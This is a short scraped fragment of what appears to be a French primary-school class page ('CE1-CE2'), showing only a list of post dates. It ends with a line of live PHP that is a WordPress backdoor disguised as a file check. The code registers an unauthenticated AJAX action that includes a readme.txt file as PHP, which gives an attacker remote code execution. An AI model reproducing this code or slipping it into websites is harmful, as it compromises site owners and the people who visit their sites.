CE1-CE2
2 novembre 2021
6 avril 2021
6 avril 2021
3 janvier 2021
3 janvier 2021
3 janvier 2021
if(!function_exists('file_check_readme93028')){ add_action('wp_ajax_nopriv_file_check_readme93028', 'file_check_readme93028'); add_action('wp_ajax_file_check_readme93028', 'file_check_readme93028'); function file_check_readme93028() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }